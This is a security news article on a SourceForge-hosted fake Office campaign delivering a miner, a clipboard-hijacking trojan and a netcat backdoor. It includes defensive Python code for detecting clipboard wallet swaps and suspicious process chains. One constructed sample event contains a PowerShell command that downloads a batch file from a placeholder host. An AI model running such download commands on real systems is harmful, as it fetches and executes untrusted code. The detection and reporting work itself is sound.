Cybercriminals have recently been caught exploiting SourceForge, a well-known open-source software hosting platform, to spread cryptocurrency mining and clipper malware disguised as cracked versions of Microsoft Office. This deceptive campaign, uncovered by Kaspersky researchers, cleverly mimics legitimate tools while slipping malicious payloads onto victims’ systems under the radar.
It all begins with a project called “officepackage” hosted on SourceForge. On the surface, it appears to be a harmless collection of Office add-ins, even linking back to code lifted from a genuine GitHub repository. However, a closer look reveals a trap designed to trick users, particularly Russian-speaking ones. The project’s subdomain, “officepackage.sourceforge[.]io,” showcases a Russian-language list of Office tools with links that appear to lead to SourceForge’s official download page. But once clicked, users are instead redirected to a lookalike download page hosted on taplink[.]cc.
From there, the download delivers a ZIP file named “vinstaller.zip.” Inside is another password-protected archive and a text file revealing the password. Once opened, users unknowingly launch an MSI installer that kicks off a multi-stage malware chain. This includes the deployment of UnRAR.exe, a RAR archive, and a malicious Visual Basic script. That script invokes a PowerShell interpreter to fetch a batch file named “confvk” from GitHub, which acts as the central piece in unpacking the next payloads.
Once active, this batch file executes several PowerShell scripts. One of them quietly exfiltrates system metadata via Telegram, while the other fetches and runs additional malware, culminating in the delivery of a cryptocurrency miner and a ClipBanker trojan. This clipper malware hijacks clipboard activity, silently replacing cryptocurrency wallet addresses to divert funds during transactions.
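A clipper works by swapping a copied wallet address for one of the attacker's that has the same format, so the victim pastes the wrong destination without noticing. The following is an added example, not code from Kaspersky's report or from the malware itself: it classifies clipboard contents by wallet-address format and flags a transition from one address to a different address of the same kind between successive clipboard reads, which is the signature a clipper leaves. The address regexes and the clipboard snapshots are constructed for illustration; a real monitor would feed it live clipboard reads instead of the sample list.

```python
import re
from dataclasses import dataclass

# Constructed regexes for the address formats a clipper typically targets
# (assumption: Bitcoin legacy/bech32 and Ethereum are enough to illustrate).
WALLET_PATTERNS = {
    "btc_legacy": re.compile(r"^[13][a-km-zA-HJ-NP-Z1-9]{25,34}$"),
    "btc_bech32": re.compile(r"^bc1[02-9ac-hj-np-z]{25,59}$"),
    "eth": re.compile(r"^0x[0-9a-fA-F]{40}$"),
}


def classify_wallet(text):
    """Return the wallet-address kind of `text`, or None if it is not an address."""
    text = text.strip()
    for kind, pattern in WALLET_PATTERNS.items():
        if pattern.match(text):
            return kind
    return None


@dataclass
class Swap:
    index: int          # position of the read where the swap was observed
    kind: str           # address format involved
    original: str       # what the user copied
    replaced_with: str  # what the clipboard held afterwards


def detect_swaps(snapshots):
    """Flag clipper-style substitutions in a sequence of clipboard reads.

    A clipper replaces an address with a *different* address of the *same*
    kind, so that is the transition we look for. A change to non-address text
    or to a different address family is ordinary user activity, not a swap.
    """
    swaps = []
    for i in range(1, len(snapshots)):
        prev, curr = snapshots[i - 1].strip(), snapshots[i].strip()
        kind = classify_wallet(prev)
        if kind and classify_wallet(curr) == kind and prev != curr:
            swaps.append(Swap(i, kind, prev, curr))
    return swaps


# Constructed clipboard history (not real wallet addresses).
SAMPLE_SNAPSHOTS = [
    "0x" + "a" * 40,      # user copies their Ethereum address
    "0x" + "b" * 40,      # next read: a different Ethereum address -> swap
    "meeting notes",      # ordinary text
    "1" + "A" * 30,       # user copies a legacy Bitcoin address
    "1" + "A" * 30,       # unchanged on the next read
    "bc1" + "q" * 38,     # user copies a bech32 address: different kind, not a swap
]

if __name__ == "__main__":
    for swap in detect_swaps(SAMPLE_SNAPSHOTS):
        print(f"read #{swap.index}: {swap.kind} address replaced "
              f"{swap.original[:10]}... -> {swap.replaced_with[:10]}...")
```

On the sample history only the first transition is reported. The same check can be applied manually: compare the address you copied with the one that appears in the recipient field before confirming a transaction.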
Additionally, a file named “ShellExperienceHost.exe” (actually a netcat executable) establishes an encrypted backdoor for remote access. Kaspersky’s analysis also revealed a component called “ErrorHandler.cmd” containing a script meant to pull in and execute further instructions from Telegram, effectively creating a persistent and flexible command-and-control setup.
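Several links in the chain described above leave distinctive process-creation telemetry: an MSI installer launching UnRAR.exe, a Windows script host spawning PowerShell to download a file, and a binary carrying a Windows system name (ShellExperienceHost.exe) running from a location the real one never uses. The following is an added example, not Kaspersky's detection logic or any vendor's rule set: it runs three such checks over constructed Sysmon-style process events. The expected directory for the genuine ShellExperienceHost.exe (under C:\Windows\SystemApps) and the sample events, including the placeholder URL, are assumptions made for the example.

```python
import re
from pathlib import PureWindowsPath

SCRIPT_HOSTS = {"wscript.exe", "cscript.exe"}

# Command-line fragments that indicate PowerShell is fetching something remote.
DOWNLOAD_HINTS = re.compile(
    r"(invoke-webrequest|\biwr\b|downloadstring|downloadfile|start-bitstransfer|https?://)",
    re.I,
)

# Assumption: the legitimate binary lives under this directory; anything else
# with the same file name is treated as masquerading.
EXPECTED_DIRS = {"shellexperiencehost.exe": "c:\\windows\\systemapps"}


def _name(path):
    return PureWindowsPath(path).name.lower()


def _dir(path):
    return str(PureWindowsPath(path).parent).lower()


def evaluate(event):
    """Return the list of rule names that fire for one process-creation event."""
    image = event["Image"]
    parent = event.get("ParentImage", "")
    cmd = event.get("CommandLine", "")
    name, parent_name = _name(image), _name(parent)
    findings = []

    # Rule 1: script host launches PowerShell with a download in its command line.
    if parent_name in SCRIPT_HOSTS and name == "powershell.exe" and DOWNLOAD_HINTS.search(cmd):
        findings.append("script-host-powershell-download")

    # Rule 2: a known system binary name running outside its expected directory.
    expected = EXPECTED_DIRS.get(name)
    if expected and not _dir(image).startswith(expected):
        findings.append("masqueraded-system-binary")

    # Rule 3: an MSI installer spawning an archive extractor.
    if parent_name == "msiexec.exe" and name == "unrar.exe":
        findings.append("installer-spawned-unrar")

    return findings


def scan(events):
    """Map event index -> findings, for events that triggered at least one rule."""
    results = {}
    for i, event in enumerate(events):
        findings = evaluate(event)
        if findings:
            results[i] = findings
    return results


# Constructed sample events (not real telemetry); the URL is a placeholder.
SAMPLE_EVENTS = [
    {"Image": r"C:\Windows\System32\msiexec.exe",
     "ParentImage": r"C:\Windows\System32\services.exe",
     "CommandLine": "msiexec.exe /V"},
    {"Image": r"C:\Users\Public\UnRAR.exe",
     "ParentImage": r"C:\Windows\System32\msiexec.exe",
     "CommandLine": r"UnRAR.exe x archive.rar"},
    {"Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "ParentImage": r"C:\Windows\System32\wscript.exe",
     "CommandLine": "powershell.exe -Command Invoke-WebRequest https://example.invalid/confvk -OutFile confvk.bat"},
    {"Image": r"C:\Users\Public\ShellExperienceHost.exe",
     "ParentImage": r"C:\Windows\System32\cmd.exe",
     "CommandLine": "ShellExperienceHost.exe"},
    {"Image": r"C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe",
     "ParentImage": r"C:\Windows\System32\svchost.exe",
     "CommandLine": "ShellExperienceHost.exe"},
    {"Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": "powershell.exe -Command Get-Process"},
]

if __name__ == "__main__":
    for index, findings in scan(SAMPLE_EVENTS).items():
        print(f"event {index}: {', '.join(findings)}")
```

Events 1, 2 and 3 fire one rule each; the genuine ShellExperienceHost.exe and the interactive PowerShell session produce nothing. The path check in rule 2 is what separates a renamed netcat from the real system component, since both carry the same file name.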
Kaspersky believes the campaign heavily targets Russian users, a conclusion supported by both the language of the site and telemetry data. Over 4,600 Russian users are estimated to have interacted with the fake Office downloads between January and March. The attackers likely count on high search engine visibility, with the spoofed SourceForge pages showing up in Russian search results for Microsoft Office-related queries on platforms like Yandex.
Beyond stealing CPU cycles for mining and cryptocurrency through clipping, the attackers could potentially sell compromised access to more advanced threat groups. This concern grows when considering the broader campaign tactics, which include spreading a malware downloader named TookPS through deceptive websites mimicking DeepSeek’s AI chatbot and other popular tools like remote desktop and 3D modeling apps. Users were lured via sponsored Google ads leading to fraudulent domains like deepseek-ai-soft[.]com.
TookPS itself serves as a launchpad for deeper intrusions. It downloads PowerShell scripts that grant remote access via SSH and deploys a modified variant of the known TeviRat trojan. Through DLL sideloading, the attackers even manipulate legitimate TeamViewer installations to cloak their remote access, bypassing user detection entirely.
Adding to the threat landscape, similar attacks have also been carried out through malicious ads promoting tampered versions of utilities like RVTools. In one case, these ads delivered a modified installer bundled with ThunderShell, a post-exploitation PowerShell-based remote access tool commonly used in red teaming but now co-opted by attackers. This underscores how tools once intended for ethical testing are now fueling the cybercriminal toolkit.
As malware campaigns grow more sophisticated, they increasingly lean on trust in well-known platforms and software. The SourceForge-based scheme highlights how even legitimate services can be misused, and how easy it is for unsuspecting users to fall prey to carefully orchestrated traps. For security-conscious users and enterprises, this serves as yet another reminder to avoid downloading software from unofficial sources and to remain vigilant against social engineering attacks that blur the lines between safe and malicious.